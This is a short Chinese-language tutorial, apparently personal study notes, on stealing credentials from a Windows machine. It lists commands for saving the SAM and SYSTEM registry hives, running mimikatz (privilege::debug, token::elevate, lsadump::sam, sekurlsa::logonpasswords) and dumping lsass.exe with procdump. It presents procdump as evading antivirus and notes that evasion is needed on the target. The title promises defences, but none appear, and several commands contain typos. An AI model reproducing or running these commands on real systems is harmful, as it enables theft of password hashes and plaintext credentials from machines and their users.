单机密码抓取与防范
想要获取windows操作系统中抓取散列值或明文密码,必须将权限提升至system。
本地用户名,散列值,其他安全验证信息都保存在sam文件中。
lsass.exe进程用于实现windows的安全策略(本地安全策略和登陆策略)
可以使用工具将散列值和明文密码从内存中的lsass.exe进程或SAM文件中导出
通过SAM和system文件抓取密码
SAM文件
1.导出SAM和system文件
无工具导出SAM文件
reg save hklm\sam sam.hive
reg save hklm\sytem system.hive
2.通过读取sam和system文件获得ntlm hash
mimikatz读取SAM和system文件
将sam.hive 和system.hive存放到mimikatz目录下
mimikatz# lsadump::sam /sam:sam.hive /system:sysytem.hive
mimikatz读取本地sam文件导出hash信息
需要在目标机上运行,必须考虑到目标机器上有免杀的特质
mimikatz# privilege::debug #提升权限
mimikatz# token::elevate #提权至system
#输入lsadump::sam 读取本地sam文件,获取NTLMhash
mimikatz读取在线的sam文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
LSASS.dmp文件
1.使用procdump导出lsass.dmp文件
procdump是微软官方发布的工具,可以在命令行下生成lsass文件导出,且不报毒
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2.利用miimkatz导出lsass.dmp文件的密码hash
#将lsass.dmp文件加载到mimikatz目录中
sekurlsa:minidump lsass.dmp
#出现swtich to minidump字样,表示加载成功
#导出散列值
sekurlsa::logonpasswords full